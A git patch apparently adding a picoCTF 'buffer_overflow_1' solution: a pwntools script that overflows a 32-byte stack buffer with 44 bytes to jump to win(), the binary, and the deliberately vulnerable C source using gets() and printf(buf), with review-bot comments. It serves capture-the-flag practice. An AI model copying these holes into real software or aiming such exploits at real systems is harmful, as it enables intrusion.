From 2e33defa564a0325aa9458b98cf4fffbe778f4c0 Mon Sep 17 00:00:00 2001
From: h7x4
Date: Tue, 3 Sep 2024 19:33:13 +0200
Subject: [PATCH] pwn/buffer_overflow_1
---
pwn/buffer_overflow_1/solve.py | 31 ++++++++++++++++++++++++
pwn/buffer_overflow_1/vuln | Bin 0 -> 15704 bytes
pwn/buffer_overflow_1/vuln.c | 42 +++++++++++++++++++++++++++++++++
3 files changed, 73 insertions(+)
create mode 100755 pwn/buffer_overflow_1/solve.py
create mode 100755 pwn/buffer_overflow_1/vuln
create mode 100644 pwn/buffer_overflow_1/vuln.c
diff --git a/pwn/buffer_overflow_1/solve.py b/pwn/buffer_overflow_1/solve.py
new file mode 100755
index 0000000..60b811c
--- /dev/null
+++ b/pwn/buffer_overflow_1/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -p python3 -i python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("./vuln")
+
+context.binary = exe
+
+ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()
+
+def conn():
+ if args.REMOTE:
+ r = remote(ADDR, PORT)
+ else:
+ r = process([exe.path])
+
+ return r
+
+def main():
+ r = conn()
+
+ r.recvuntil(b"Please enter your string:")
+ offset = 44 # found with pwndbg
+ payload = b'A' * offset + p32(exe.sym.win)
+ r.sendline(payload)
+ print(r.recvall())
+ r.close()
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
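Review bot: `ADDR, PORT, *_ = "saturn.picoctf.net 60178".split()` leaves PORT as the string `"60178"` and the `*_` binds nothing; pwntools' `remote()` coerces the port, but a plain `ADDR, PORT = "saturn.picoctf.net", 60178` states the types directly. The file has no docstring: a module docstring naming the challenge and stating that `./vuln` is the binary built from the `vuln.c` in the same directory (and that `offset = 44` was measured against that build, as the inline comment hints) would tell a reader what the script assumes. `r.recvall()` reads to EOF and, as far as I recall, closes the tube itself, so the following `r.close()` is redundant but harmless; `print(r.recvall().decode(errors="replace"))` would also print the returned text rather than a bytes repr.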
diff --git a/pwn/buffer_overflow_1/vuln b/pwn/buffer_overflow_1/vuln new file mode 100755 index 0000000000000000000000000000000000000000..05e89bfb6fde125a2649cb0b23dc1bfef1bdff09 GIT binary patch literal 15704 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 literal 0 HcmV?d00001
diff --git a/pwn/buffer_overflow_1/vuln.c b/pwn/buffer_overflow_1/vuln.c
new file mode 100644
index 0000000..e2dcd2c
--- /dev/null
+++ b/pwn/buffer_overflow_1/vuln.c
@@ -0,0 +1,42 @@
+#include
+#include
+#include
+#include
+#include
+#include "asm.h"
+
+#define BUFSIZE 32
+#define FLAGSIZE 64
+
+void win() {
+ char buf[FLAGSIZE];
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(buf,FLAGSIZE,f);
+ printf(buf);
+}
+
+void vuln(){
+ char buf[BUFSIZE];
+ gets(buf);
+
+ printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
+}
+
+int main(int argc, char **argv){
+
+ setvbuf(stdout, NULL, _IONBF, 0);
+
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+
+ puts("Please enter your string: ");
+ vuln();
+ return 0;
+}
+
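Review bot: `vuln.c` includes `"asm.h"` and calls `get_return_address()` in `vuln()`, but `asm.h` is not among the three files in the diffstat, so the committed source cannot be rebuilt to reproduce the checked-in `vuln` binary; either add the header or say in a comment that this is the challenge handout and the binary is the one distributed with it. Since the file is vulnerable by design (`gets(buf)`, `printf(buf)` on the flag contents, `f` never closed in `win()`), a one-line header such as `/* picoCTF buffer_overflow_1 handout: intentionally vulnerable, not for reuse */` would stop it being mistaken for production code or re-flagged by static analysis. The `#include` lines show no header names in this rendering, which looks like an extraction artifact rather than the committed text.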